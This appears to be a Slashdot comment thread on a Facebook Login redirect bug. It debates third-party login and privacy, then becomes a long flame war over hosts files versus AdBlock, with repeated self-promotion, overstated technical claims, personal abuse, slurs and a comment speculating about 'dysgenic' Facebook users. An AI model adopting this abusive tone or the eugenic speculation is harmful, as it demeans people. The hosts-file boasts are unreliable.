      I use Twitter when the option is available only because they don't collect data on me like facebook does. If it's facebook only, I usually won't sign up.

    5. Re:It Has Its Ups and Downs by Sockatume · · Score: 2

      If Facebook sold that information you'd have a point, but as it's not disclosed in any of their privacy literature that'd be a monstrous and legally actionable breach of their information protection obligations.

      --
      No kidding!!! What do you say at this point?
    6. Re:It Has Its Ups and Downs by DragonWriter · · Score: 3, Interesting

      Even though ultimately facebook is probably a bad choice for it, what else is so ubiquitous as to be a reasonable option that also doesnt suffer the same essential problems (certainly not a google account?)

      OpenID. Sure, a provider having a similar error could stop users of that provider from logging on to your site, but its not a single point of failure for the entire site, its a single point of failure for the user and all the sites they use it to log into.

    7. Re:It Has Its Ups and Downs by DogDude · · Score: 2, Insightful

      Hey kid, I've got a bridge to sell ya'....

      --
      I don't respond to AC's.
    8. Re:It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      Bonus advantage: you don't have to worry about anyone who doesn't use/want to use facebook wanting to use your site.

    9. Re:It Has Its Ups and Downs by intoxination · · Score: 0

      This wasn't limited to sites that use Facebook Connect though. It also affected sites that have the Facebook Like button on it, as that apparently relies on connect. So you think you got something really simple on your site that an outage like this shouldn't effect, yet it does.

    10. Re:It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      To prevent that single point of failure I just don't use facebook for login credentials, ever.

    11. Re:It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      can we please stop relying on third parties for things *you* should be providing to your users.

      Clearly it has benefits and disadvantages. One of the disadvantages is displayed in this story. I could name a decent amount of benefits though: 1) you don't have to register again and again every time you want to use some site. 2) you don't suffer from password fatigue. 3) you don't have to worry about no talent ass clowns storing your username and password in plaintext (although you do have to worry about facebook being no talent ass clowns about that). 4) if I just want to stand up a quick little site that is nothing more than CRUD associated to users then all that login stuff can be offloaded to facebook or whomever. 5) from a large corporation standpoint, you can now get additional social data about your users from the facebook api (I know, this isn't necessarily an advantage for the end user and is best viewed as double edged).

      Yes, I'm more than willing to put up with password fatigue. If I want to use a site badly enough, I'll make up a distinct password for it.

      It was only this morning that I wrote an email to the webmaster of my local newspaper complaining about how it uses Facebook for authentication.

      Are you opposed to openID too?

      Yes! I don't trust third-party authentication mechanisms in general. As far as websites go, I trust Facebook the least.

    12. Re:It Has Its Ups and Downs by Pope · · Score: 1

      I use Twitter when the option is available only because they don't collect data on me like facebook does. If it's facebook only, I usually won't sign up.

      Of course Twitter collects as much data on you as they possibly can. How else are they making money?

      --
      It doesn't mean much now, it's built for the future.
    13. Re:It Has Its Ups and Downs by theskipper · · Score: 1

      Facebook is an advertising company. Their product is highly granular, per-user demographics and profiles. That product is based on information gathered from tracking their users' posts, relationships, browsing history and basically any info they can get their hands on (raw materials). The product is then sold to their customers; anyone who does a targeted media buy on their site, as well as advertisers and marketing firms.

      Without the raw materials, Facebook would not be a for-profit venture and their stock would be worthless. You can argue semantics that they're not blatantly selling the info. But the info is getting sold in some fashion, it's their business plan and clear as day in the original prospectus filed with the SEC.

    14. Re:It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      You have to be one special kind of idiot if you think they're not sharing your info.

    15. Re:It Has Its Ups and Downs by Anonymous Coward · · Score: 0

      Just like the fake "sign in with google" on youtube (and elsewhere), this "sign in with facebook" shit is everywhere on the internet.

      IT'S NOT WHAT IT SAYS!

      There aren't even people properly ranting about this abomination.

      IT'S NOT WHAT IT SAYS!

      The words are used to make a less desirable process (share one's facebook information with X to create a user account with X) seem like a more desirable process (log in using your facebook credentials, which will save you from having to create yet another freaking user account).

      It is no mistake that they use the words incorrectly.

      It is done on purpose.

      It id done with intent.

      It is done deliberately.

      It is done to deceive.

      It is a FUCKING LIE!

      They try to make it seem like you're entering the mythical single sign-on wonderland, which has been promised since the dial-up days.

      But you are not.

      You are entering into the same old shit.

      What was the name of the favorite pet of your favorite teacher who shared a surname with your maiden mother.

      And, BTW, we'd really like to get our hands on all your info, too.

      It is a FUCKING LIE!

    16. Re:It Has Its Ups and Downs by chrismcb · · Score: 1

      Who in their right mind would want every company/web site to know all of the intimate details of what they're doing on every other web site?

      Most people would not want that.
      But most people don't care. First of all most people don't even know, or consider what is actually happened. Secondly it is convenient for most people. And thats pretty much why it will continue.

    17. Re:It Has Its Ups and Downs by Common+Joe · · Score: 1

      4) if I just want to stand up a quick little site that is nothing more than CRUD associated to users then all that login stuff can be offloaded to facebook or whomever.

      You touch upon something that has bothered me for a long time. It is pretty complicated to securely "log in" to a system on the web. I'm not a website developer, but it seems to be coming to a point where website developers require 3rd party APIs for a simple CRUD system. Aren't we doing something wrong in the computer world?

    18. Re:It Has Its Ups and Downs by DKlineburg · · Score: 1

      Agree. They all collect data on you. Bing asked me to link my web searches to other things. I wonder why they wanted that? Even promised one lucky bloke an x-box 360.

      --
      Memory is deceptive because it is colored by today's events. - Albert Einstein
  16. Annoying! by SirAudioMan · · Score: 1

    At first I thought I somehow angered facebook and caused my session to get corrupted! Each time I visited a few different news sites after a few seconds It would be redirected to the error page. I ended up having to clear my cache to prevent the annoying redirect. I find facebook is good as a time waster but I find it scary how many sites have access to my logins and can track and control content.

  17. Too big to fail by Anonymous Coward · · Score: 1

    Obviously Facebook is too big to fail, so every time they bork the internet we should give them a billion dollars.

    1. Re:Too big to fail by leuk_he · · Score: 1

      No internet company should be too big to fail. .... But we give them billions anyway. Google in advertising, Facebook as "like"people, Microsoft for your desktop OS. Apple because it is shiny.

  18. What's also interesting... by raehl · · Score: 3, Interesting

    ...I got this bug on a website I do *NOT* use Facebook to log into, so the Facebook statement appears incorrect in that regard. (I was logged into Facebook in that browser though.)

  19. clear skies fuck you up by Nyder · · Score: 1

    I never use another site to log into a different site. Sure, Facebook is big today, but this is the internet, this is technology. Myspace? Geocities?

    What do you do when FB for whatever reason, suddenly stops? All those sites you used to use facebook to log in, you can't get in. You think FB is going to care when their stock is going for pennies?

    My suggestion, don't use other sites to handle your log in for you.

    My other suggestion: FB is a troll, quit feeding it.

    --
    Be seeing you...
    1. Re:clear skies fuck you up by omnichad · · Score: 1

      I participate in comment discussion on the Gawker blogs - Lifehacker, particularly. They took away their own login system after they screwed it up so badly they gave away everyone's password. The community there is nice, but the site owners are stupid. I say, please let them use Facebook. When Facebook stops? They'll give me a way to transition to whatever they choose next.

      Of course, if I have a choice, I don't log in with Facebook.

      But I believe that Facebook Connect provides enough demographic info back to the site (your email address) that your profile can be rejoined with a new authentication system fairly easily - even if Facebook just disappears at once without any transition period.

  20. A Javascript problem, really by omnichad · · Score: 1

    Javascript has been putting in security restrictions for a while now. You can't open a new window without a user click. Most browsers now block automatic window popups.

    Why are we still allowing something as archaic as a Javascript redirect? We already have meta tags and HTTP header redirects. We don't need browser navigation without a click to exist in Javascript.

    Sure, you could blame Facebook - they did put out a bad script, but the fact that this is even possible is really on the browser makers.

  21. "is best viewed as double edged" LOL by Anonymous Coward · · Score: 0

    I think you meant "is best viewed as A double edged SWORD"... stop rewriting the language.

  22. Re:AdBlock & Ghostery = inferior to hosts by omnichad · · Score: 1

    Oh, great. Good plan. Completely block Facebook with a hosts file. This only affected logged in Facebook users. People who aren't going to add facebook's scripting domains to their hosts file.

  23. NOT about hosts ability to BLOCK by Anonymous Coward · · Score: 0

    It's about how hosts hardcodes avoid redirects (hosts can do that)!

    I.E. -> You can also avoid DNS servers being unpatched for 1/2 a decade now (even though a fix exists, worst of all, @ the ISP level), AND likely this redirect problem for facebook technically as well:

    ---

    5 Years After Major DNS Flaw Found, Few US Companies Have Deployed Long-term Fix:

    http://it.slashdot.org/story/13/01/29/1859257/5-years-after-major-dns-flaw-found-few-us-companies-have-deployed-long-term-fix

    ---

    Again - Since hardcodes in hosts determine the host-domain name resolution 1st:

    ---

    Microsoft TCP/IP Host Name Resolution Order:

    http://support.microsoft.com/kb/172218

    PERTINENT QUOTE/EXCERPT:

    "The client checks to see if the name queried is its own.

    The client then searches a local Hosts file, a list of IP address and names stored on the local computer.

    A sample hosts file, Hosts.sam, is installed with the TCP/IP protocol showing the proper format.

    Domain Name System (DNS) servers are queried.

    If the name is still not resolved, NetBIOS name resolution sequence is used as a backup. This order can be changed by configuring the NetBIOS node type of the client."

    ---

    Loaded @ OS startup too, by the IP stack itself (since host are TIGHTLY INTEGRATED as part of it also) running in Ring 0/RPL 0/kernelmode (vs. far, Far, FAR SLOWER usermode/Ring 3/RPL 3 & slower code in addons (ala AdBlock's python/javascript code) + browser addons SLOW DOWN WEBBROWSERS (known issue in FireFox, stack up a few & see for yourself)...

    AND

    Hosts are referred to by default FIRST by ANY WEBBOUND APP:

    Including webbrowsers & their addons (which CANNOT resolve ip addresses "by themselves") which makes AdBlock or Ghostery, redundant (especially since they're advertiser)...

    APK

    P.S.=>

    1. Re:NOT about hosts ability to BLOCK by UnknownSoldier · · Score: 1

      On all my systems I replace hosts with this nice updated ad/spy/trojan blocking one:
              http://winhelp2002.mvps.org/hosts.txt

      Can fellow /. readers recommend any other good ones?

    2. Re: NOT about hosts ability to BLOCK by Anonymous Coward · · Score: 0

      I just wanted to say that these posts are amazing. I thought everyone that knew what they were talking about left slashdot long ago.

      It's been years since I read a comment that made me go and learn more, or that challenged long held assumptions.

      In short...thank you.

    3. Re:NOT about hosts ability to BLOCK by Sardaukar86 · · Score: 1

      Once again you fail, your argument is repetitious and annoying (regardless of their technical merit). Everyone who has responded to you so far has been modded up; you have not. Do you still choose to see this as evidence to you of your awesomity?

      Face it, APK, people aren't interested in what you have to say. They don't care that you might be right; they've correctly determined that reading your posts is a waste of their time.

      --
      ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
    4. Re:NOT about hosts ability to BLOCK by Anonymous Coward · · Score: 0

      How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ? On the same thing you're saying now again no less?? Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 and good luck. You'll need it since no one can or has, ever.

  24. Ran into this. Only happened if I was logged in by Christianfreak · · Score: 1

    I was getting this yesterday when reading an article on Mashible. I noticed that it stopped doing it by logging out of Facebook. Probably something I should be doing anyway to prevent them from tracking me all over the place

  25. And . . . by hduff · · Score: 1

    . . . nothing of value was lost.

    --
    "I believe in Karma. That means I can do bad things to people all day long and I assume they deserve it." : Dogbert
  26. Facebook is a fun distraction but protect yourself by ohcrapitssteve · · Score: 1

    Protecting yourself against weird things Facebook does is actually fairly simple. I sandbox FB in it's own browser. It's all I use Firefox for, that and the occasional browser compatibility test, but I reset cookies/cache/etc before and after. Combine that with a fake name and you're largely safe to post whatever you want. Won't fool, like, law enforcement or whatever if they look specifically at you, but it will confuse whatever automated ad/cross site dossier these companies are compiling on you. I tie it to the dumpster gmail address I use when I know I'm going to get spammed (drop in your biz card, win a free happy hour!) and bam, I don't even think I've ever touched the privacy settings menu.

  27. "Quickly Resolved"...? by InvisibleClergy · · Score: 1

    I noticed this several times across a span of 9 hours, from first notice to last notice. I would hardly call that "quick".

  28. Good one: Here's more... apk by Anonymous Coward · · Score: 0

    Sources for custom hosts file data for a myriad of purposes, all listed here (which THIS VERY PROGRAM uses):

    ---

    APK Hosts File Engine 5.0++ 32/64-bit:

    http://www.start64.com/index.php?option=com_content&id=5851:apk-hosts-file-engine-64bit-version&Itemid=74

    ---

    SOURCES IT USES FOR CUSTOM HOSTS FILE DATA INTAKE:

    http://safeweb.norton.com/buzz

    http://hosts-file.net/?s=Download

    http://hostsfile.org/hosts.html

    http://winhelp2002.mvps.org/hosts.htm

    https://zeustracker.abuse.ch/monitor.php?filter=lastupdated

    https://spyeyetracker.abuse.ch/monitor.php?filter=all

    http://www.malware.com.br/cgi/submit?action=list_hosts_win_0000

    http://www.malwareurl.com/

    http://www.malwaredomainlist.com/hostslist/hosts.txt

    http://mirror1.malwaredomains.com/files/

    http://sysctl.org/cameleon/hosts

    http://pgl.yoyo.org/as/serverlist.php?hostformat=hosts&showintro=1&mimetype=plaintext

    http://hostsfile.mine.nu/downloads/

    http://ddanchev.blogspot.com/

    ---

    * HOWEVER: You don't NEED TO KNOW THAT, since the program above uses most all of those sources listed above, & does the work for you, of - Import, Deduplicate & Filter/Normalize + Convert blocking address format used, Speed up hardcoded favorites (which ARE what can solve redirection problems in DNS & most likely here too with facebook mind you), & Save to hosts itself... from those very reliable & reputable sources for custom hosts file data online!

    APK

    P.S.=> Enjoy if you use the program I wrote above, & good on your part to see here that you have enough sense to take advantage of custom hosts files for better online speed, security, reliability, & of course, even better anonymity (to an extent, vs. DNS request logs OR vs. DNSBL's you may not like too)...

    ... apk

  29. Unhappiness and dysgenics by hessian · · Score: 1

    I would add unhappy to your list of qualities that make up the bulk of social site users. Many of the people I know who are regular users remain in contact with old flames even though they are now like Al Bundy. Here's to hoping these extra opportunities to procreate don't result in the psychologically healthy being out-bred by this genotypical subset.

    I've noticed this as well. People tend to try to "justify" their lives using lifestyle and/or perceived success. For example, a recent survey of Facebook friends found that almost 3/4 of the profile pictures contained either (a) alcohol or (b) children. It's like saying "See what I have, I'm doing quite well."

    I don't think that sort of pre-emptive bragging happens when people are actually happy. Instead, as you've observed, there are signs of misery. Lots of scheming and pseudo-romance. It's creepy.

    The dysgenic effects will undoubtedly be felt by future generations. It's as if we're breeding humanity into obese deskbound drama queens that know how to look successful on Facebook, but not succeed at real-life things like happiness and fidelity!

  30. Redirect facebook yourself! by I+AOk · · Score: 1

    $ grep facebook /etc/hosts
    127.0.0.1 www.facebook.com

    --
    [iconv --from-code=utf-7]
  31. Deja-vu by capebretonsux · · Score: 1

    'For a short period of time, there was a bug that redirected people logging in with Facebook from third party sites to Facebook.com. The issue was quickly resolved, and Login with Facebook is now working as usual.'

    Yes. Never mind that gitch in the matrix.

  32. Glad I dumped FB by Anonymous Coward · · Score: 0

    I use another site Mutineer.org which uses no Javascript at all.

  33. Nothing to do with accounts by Tony+Isaac · · Score: 1

    The problem yesterday had nothing to do with sites offloading authentication to Facebook. It was simply sites that have a little Facebook ad--like "what's popular on Facebook." I experienced this yesterday, just looking for a store location--there was a Facebook ad on the page that instantly redirected to Facebook.

  34. Amazing they're all down-modded too, eh? by Anonymous Coward · · Score: 0

    "Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!" - Myself, FROM -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613 AND FROM -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729

    Making my "predictions" come true in BOTH posts, just as I said they would be... & more importantly, why I suspect WHY as well!

    APK

    P.S.=>

    "I just wanted to say that these posts are amazing. I thought everyone that knew what they were talking about left slashdot long ago. It's been years since I read a comment that made me go and learn more, or that challenged long held assumptions. In short...thank you." - by Anonymous Coward on Saturday February 09, @02:16AM (#42841687)

    You're welcome, & glad you liked them!

    However - It seems that the advertisers (no doubt), & others that downmodded my posts (see links above in the 1st quote of myself), didn't!

    "Gee, I wonder WHY?"... (lol, NOT!).

    Perhaps since they told the truth with backing verifiable & undeniable data from reputable sources?

    ... apk

    1. Re:Amazing they're all down-modded too, eh? by Sardaukar86 · · Score: 1

      "Now - I truly KNOW this post will no doubt be downmodded, because Advertisers do NOT want this type of information getting out en-masse to enlighten users - they bought out Ghostery, crippled Adblock, but TRY THAT with a local hosts file (good luck!) especially one a user builds himself!" - Myself, FROM -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613 AND FROM -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729

      Making my "predictions" come true in BOTH posts, just as I said they would be... & more importantly, why I suspect WHY as well!

      APK

      P.S.=>

      "I just wanted to say that these posts are amazing. I thought everyone that knew what they were talking about left slashdot long ago. It's been years since I read a comment that made me go and learn more, or that challenged long held assumptions. In short...thank you." - by Anonymous Coward on Saturday February 09, @02:16AM (#42841687)

      You're welcome, & glad you liked them!

      However - It seems that the advertisers (no doubt), & others that downmodded my posts (see links above in the 1st quote of myself), didn't!

      "Gee, I wonder WHY?"... (lol, NOT!).

      Perhaps since they told the truth with backing verifiable & undeniable data from reputable sources?

      ... apk

      You pathetic prick, why don't you get some more AC accounts to 'back you up'? You've done it so often in the past. It's not surprising for you to be using this tactic once again.

      Face it, APK, you are nothing and nobody gives a shit what you have to say.

      --
      ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
    2. Re:Amazing they're all down-modded too, eh? by Anonymous Coward · · Score: 0

      If anyone's pathetic it's you eating your words in the link below and being unable to disprove apk's points in favor of custom hosts files over adblock, ghostery, and even dns here http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729

      By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  35. AdBlock "fans" reduced to unjust downmods? by Anonymous Coward · · Score: 0

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831677
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42837727
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42834615
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42834647
    http://it.slashdot.org/comments.pl?sid=3445509&cid=42843315

    * Every single one of those posts above was down-moderated, WITH NO VALID POINTS AGAINST THE FACTS CONTAINED WITHIN THEM!

    (Your downmod's are invalid... no questions asked, trolls!)

    Each link/post above merely contains documented facts from reputable sources, & in favor of custom hosts files over AdBlock, Ghostery, & even DNS

    (The latter of which hosts supplement & protect users against their flaws, AND mainly redirection related ones - such as this one from facebook, which is SORT OF like that too, as both flaws involve redirections & hosts can prevent that (DNS poisoning in recursive mode & unpatched for 1/2 a decade vs. the Kaminsky flaw)).

    APK

    P.S.=> Pretty "poor showing" adblock/ghostery/DNS fans, when all you've got is unjustifiable downmods to *try* to vainly "hide" those posts, instead of disproving points of fact I enumerated in them...

    Which, of course, PROVES YOU CAN'T DISPROVE MY POINTS, & instead opt to attempt to hide them from others!

    ... apk

    1. Re:AdBlock "fans" reduced to unjust downmods? by Sardaukar86 · · Score: 1

      Waaaah! Waaah!

      APK: People think I suck! Waaah! Waaah!

      Yup, they do. Who do you have to blame, arsehole?

      That's right! Somebody else!

      --
      ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
    2. Re:AdBlock "fans" reduced to unjust downmods? by Anonymous Coward · · Score: 0

      Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 on that very same sentiment from you only to have yourself outnumbered nearly 250 to 1? ROTFLMAO!

  36. AdBlock/Ghostery/DNS "fans" FAIL vs. hosts by Anonymous Coward · · Score: 0

    Per my subject - Absolutely: Merely technically unjustifiable downmods vs. facts I posted in this list of my posts in this exchange:

    ---

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42831677

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42837727

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42834615

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42834647

    http://it.slashdot.org/comments.pl?sid=3445509&cid=42843315

    ---

    * Every single one of those posts above was down-moderated, WITH NO VALID POINTS AGAINST THE FACTS CONTAINED WITHIN THEM!

    After all - They contain documented facts from reputable sources, & in favor of custom hosts files over AdBlock, Ghostery, & even DNS!

    (The latter of which hosts supplement & protect users against their flaws, mainly redirection related ones - such as this one from facebooks, which is SORT OF like that too (DNS poisoning in recursive mode & unpatched for 1/2 a decade vs. the Kaminsky flaw)).

    APK

    P.S.=> Pretty "poor showing" adblock/ghostery/DNS fans, when all you've got is unjustifiable downmods to *try* to vainly "hide" those posts listed above, instead of disproving points of fact with their backing documentations also that I enumerated in them...

    Which, of course, PROVES YOU CAN'T DISPROVE MY POINTS, & instead opt to attempt to hide them from others!

    My challenge STILL stands to whoever downmodded my posts above though:

    I'll leave you with the same challenge Clark Kent/Superman got in SMALLVILLE episode "RUN" from the Flash!

    "Tell you what: IF you can catch me? I'll *think* about it..." -> http://www.youtube.com/watch?v=gzdoa5ToWYU

    The ONLY way to "catch me" (if you can)? Is to disprove my points in the 1st two links above @ the start of my post here!

    (Since otherwise, you're doing a RUN... lol, a "Run, Forrest: RUN!!!" evasion & you're left "EATING MY DUST" in the end (ala the Flash in the video clip above), nothing more along with your bogus downmods you applied to my posts with no valid technical backing behind them...)

    ... apk

    1. Re:AdBlock/Ghostery/DNS "fans" FAIL vs. hosts by Sardaukar86 · · Score: 1

      APK: Blubber blubber! Waaah Waaah! I can't believe anyone would dispute APK as Master Of The Universe! Waaah! Waaah!

      I want my 'mommy'!

      --
      ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
    2. Re:AdBlock/Ghostery/DNS "fans" FAIL vs. hosts by Anonymous Coward · · Score: 0

      Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 on that very same sentiment from you only to have yourself outnumbered nearly 250 to 1? ROTFLMAO!

  37. Re:Unjustifiable downmods? For my stating FACTS?? by Sardaukar86 · · Score: 1

    IF/WHEN the "best you've got" = bogus downmods per my subject-line above on my original post here -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831677

    ???

    You're making my point above for me, in that you're attempting to HIDE TRUTHS from others that I listed there (& in the link it leads to)!

    * Such effete measures as unjustifiable downmods won't work!

    (Yes - too bad for you trolls, since most folks here browse well below the default threshhold here on /., & thus, will see my post & what it extolls to their benefit...)

    APK

    P.S.=> Thanks for proving my points...

    ... apk

    Oh, poor baby, did we get downmodded and cry about it again? Remember what happened last time you started squealing like a stuck pig about this very subject?

    Better add this to your list of failures, or you'll lose your place as #1 fruitcake on Slashdot, APK (is that A Pernicious Kook?)

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  38. Re:Ghostery = Advertiser owned by Sardaukar86 · · Score: 1

    Per my subject above: They're "foxes guard the henhouse" -> http://it.slashdot.org/comments.pl?sid=3445509&cid=42831613 so you'd have to be a real 'cluck' to use them (pun intended) & AdBlock? Crippled by default & NO LONGER BLOCKS ALL ADS either!

    APK

    P.S.=> Just some "FYI" that has concrete solid undeniable & verifiable backing from reputable sources in the link above...

    ... apk

    Wow, some more true wisdom from APK, Bringer Of All Knowledge. Wicked pun there, I see your LITERARY WIT OUTSHINES ALL who precede you. Nice of you to point out the pun, though, as the less astute reader might have missed it & lived the rest of their poor, miserable lives BEREFT of your marvellous HUMOUR. I think we all agree that would be a => crying shame.

    ???

    Now, what IS a crying shame is that it looks like you got modded down again my friend. I'm so sorry to see such a travesty visited upon you, it fairly breaks my heart, because as we all know, the whole world is wrong and APK is a GENIUS, genius I tell you. Hmm, almost forgot to add -> an unnecessary link to the post above: http://it.slashdot.org/comments.pl?sid=3445509&cid=42831677

    I'd suggest that now is an appropriate moment to post your list again, as this PROVES how amazingly cool you are and how everyone on Slashdot thinks you're totally awesome!

    Maybe I better do it for you: sArDaUkAr86 gets the UtTeR DuStInG (did I do that right?) & Has To Eat His Words with The Bitter Taste Of Self Defeat against APK The Mighty Wielder Of Logic And Rational Argument => http://slashdot.org/comments.pl?sid=3417867&cid=42771049

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  39. Re:AdBlock & Ghostery = inferior to hosts by Sardaukar86 · · Score: 1

    Did you notice the down-mod on this as well?

    Still care to claim your superiority? Note that I don't get downmodded when I post, but you do. What does that say about you? Oh, yes - of course, it says that you Utterly Dusted me. In your nutty little world, I think you really believe it to be true.

    Get the hint: you have nothing useful to contribute to Slashdot, so stop acting like such a fucking arsehole. Slink off and learn something about interacting with other humans before you open your fat yap again.

    Don't forget to post your list again, yes - the one that proves you are Teh AweSoME - to conclude my argument for me by showing yourself up as an ignorant fool, a fifty-year-old man with the mind of a snotty brat of a child.

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  40. Re:Justify the downmod of my post validly, trolls by Sardaukar86 · · Score: 1

    Waaaah! Waaaah!

    APK: My whiny post got modded down just as it deserved!

    Better call the WAAAAAmbulance, we've got a real crybaby on our hands this time!

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  41. Re:Justify the downmod of my post validly, trolls by Sardaukar86 · · Score: 1

    lol, a "Run, Forrest: RUN!!!" evasion & you're left "EATING MY DUST" in the end

    You're a real treasure-trove, aren't you APK? Yeah, you totally smoked them, they're EATING YOUR DUST as we speak, they're cursing your name, FOILED by that wily APK!!

    What a villain you are, what a dastardly foe to come up against! Oh noes, how will we ever defend ourselves from the master of the pen?

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  42. Re:Custom hosts = Superior to AdBlock by Sardaukar86 · · Score: 1

    "It's as strong as steel, & a 3rd of the weight" - Howard Stark from the film "Captain America"

    Jesus Christ, I don't think I've seen a more retarded post all year. How fucking immature are you, Captain APK?

    You are a fifty year old man for goodness sake, look at the drivel you are posting! This is just pathetic. When are you going to grow up, manchild?

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  43. Re:Unjustifiable downmod? A challenge then! by Sardaukar86 · · Score: 1

    Waaaaah! Waaaah!

    Hint: you got downmodded because your post was FUCKING TERRIBLE. Is that so hard to understand?

    Prove you are mentally ill APK! Claim this is a conspiracy to BURY your TRUTH from the world.

    Oh.. wait.. you already did.

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  44. Re:AdBlock fanboys *trying* to "hide" these? by Sardaukar86 · · Score: 1

    Not Adblock fans, fuckwit, people who are FED UP WITH YOUR SHITTY POSTS! When are you going to wake up, you fucking stupid cunt?

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  45. Re:AdBlock fanboys *trying* to "hide" these? by Sardaukar86 · · Score: 1

    Which, of course, PROVES YOU CAN'T DISPROVE MY POINTS, & instead opt to attempt to hide them from others!

    ... apk

    No, fuckwit, you are the one who can't disprove points. You run from them, in exactly the same manner you like to accuse others of.

    You suck.

    --
    ..Mullah or Pope, Preacher or Poet, who was it wrote: "Give any one species too much rope and they'll fuck it up"?
  46. Re:AdBlock fanboys *trying* to "hide" these? by Anonymous Coward · · Score: 0

    Nobody disproved apk's points and you ate your words. How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  47. Re:Unjustifiable downmods? For my stating FACTS?? by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then since you seem fit to shoot your mouth off again. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  48. Re:Ghostery = Advertiser owned by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then since you seem fit to shoot your mouth off again. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  49. Re:AdBlock & Ghostery = inferior to hosts by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  50. Re:Justify the downmod of my post validly, trolls by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  51. Re:Justify the downmod of my post validly, trolls by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ??

  52. Re:Unjustifiable downmod? A challenge then! by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  53. Re:Custom hosts = Superior to AdBlock by Anonymous Coward · · Score: 0

    Disprove apk on hosts files over adblock, ghostery, & dns http://it.slashdot.org/comments.pl?sid=3445509&cid=42831729 then. By the way: How'd yer words taste when ya hadda eat 'em Sardaukar86 http://it.slashdot.org/comments.pl?sid=3417867&cid=42756893 ?

  54. Re:AdBlock fanboys *trying* to "hide" these? by Anonymous Coward · · Score: 0

